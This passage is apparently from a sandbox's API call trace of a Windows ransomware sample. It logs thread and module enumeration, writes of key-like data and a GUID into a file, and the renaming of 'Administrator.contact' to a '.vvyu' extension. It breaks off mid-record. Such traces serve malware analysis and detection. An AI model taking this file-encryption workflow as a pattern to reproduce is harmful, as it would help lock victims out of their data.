dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.623] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.624] GetTickCount () returned 0xf622 [0191.624] GetCurrentThreadId () returned 0x66c [0191.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.624] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.626] GetTickCount () returned 0xf622 [0191.626] GetCurrentThreadId () returned 0x66c [0191.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.626] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.628] GetTickCount () returned 0xf632 [0191.628] GetCurrentThreadId () returned 0x66c [0191.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.628] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.629] GetTickCount () returned 0xf632 [0191.629] GetCurrentThreadId () returned 0x66c [0191.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.630] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.631] GetTickCount () returned 0xf632 [0191.631] GetCurrentThreadId () returned 0x66c [0191.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.632] Thread32Next (hSnapshot=0x578, lpte=0x312f434) returned 1 [0191.633] Module32First (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.634] GetCurrentThreadId () returned 0x66c [0191.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0191.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0191.634] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.635] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.636] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.637] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.638] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.639] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.639] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.640] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.641] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.642] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.643] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.644] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.645] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.645] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.646] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.647] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.648] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.649] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.650] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.651] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.652] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.653] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.653] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.654] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.655] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.656] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.657] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.658] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.659] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.660] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.661] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.662] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.663] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.665] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.666] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.667] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.669] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.670] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.671] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.672] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.674] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.675] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.676] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.678] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.679] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.681] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.682] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.684] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.685] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.686] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.688] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.690] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.691] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.693] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.694] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.696] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.698] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.699] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.701] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.703] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.704] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.706] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.707] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.709] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.710] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.712] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.714] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.715] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.717] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.718] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.720] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 1 [0191.721] Module32Next (hSnapshot=0x578, lpme=0x312f034) returned 0 [0191.722] CloseHandle (hObject=0x578) returned 1 [0191.722] FreeLibrary (hLibModule=0x75cd0000) returned 1 [0191.722] QueryPerformanceCounter (in: lpPerformanceCount=0x312efa4 | out: lpPerformanceCount=0x312efa4*=1517137653232) returned 1 [0191.724] GlobalMemoryStatus (in: lpBuffer=0x312f414 | out: lpBuffer=0x312f414) [0191.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccadf0 [0191.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0191.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0191.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0191.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93570 [0191.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93480 [0191.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0191.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0191.751] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93498 [0191.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0191.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934b0 [0191.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0191.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934c8 [0191.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0191.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93450 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934e0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934f8 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c934e0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93450 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93480 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea79b0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93570 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea7bc0 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x655b18 [0191.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0191.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0191.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93480 | out: hHeap=0x620000) returned 1 [0191.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7dd8 [0191.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0191.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0191.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0191.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0191.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0191.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0191.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0191.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0191.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7bc0 | out: hHeap=0x620000) returned 1 [0191.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7dd8 | out: hHeap=0x620000) returned 1 [0191.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0191.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934e0 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93498 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934b0 | out: hHeap=0x620000) returned 1 [0191.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x66c990 | out: hHeap=0x620000) returned 1 [0191.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0191.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0191.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c933d8 | out: hHeap=0x620000) returned 1 [0191.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0191.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0191.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0191.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0191.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0191.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0191.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0191.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0191.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0191.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0191.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0191.826] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x10b19, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x10b19, lpOverlapped=0x0) returned 1 [0191.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0191.828] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.828] WriteFile (in: hFile=0x568, lpBuffer=0x2e914a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e914a8*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0191.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0191.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea79b0 [0191.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea79b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea7de0 [0191.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0191.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0191.830] WriteFile (in: hFile=0x568, lpBuffer=0x2ea7de0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea7de0*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7de0 | out: hHeap=0x620000) returned 1 [0191.831] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.831] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.831] CloseHandle (hObject=0x568) returned 1 [0191.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0191.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea79b0 [0191.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0191.834] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.vvyu" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact.vvyu")) returned 1 [0191.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0191.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0191.837] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cd50 | out: hHeap=0x620000) returned 1 [0191.839] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0191.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0191.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.840] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini") returned=".ini" [0191.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0191.840] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0191.840] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0191.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0191.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0191.841] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0191.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0191.841] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0191.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0191.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0191.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdde58 | out: hHeap=0x620000) returned 1 [0191.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde58 [0191.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0191.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0191.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0191.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0191.846] HeapFree (in: hHeap=0x620000, 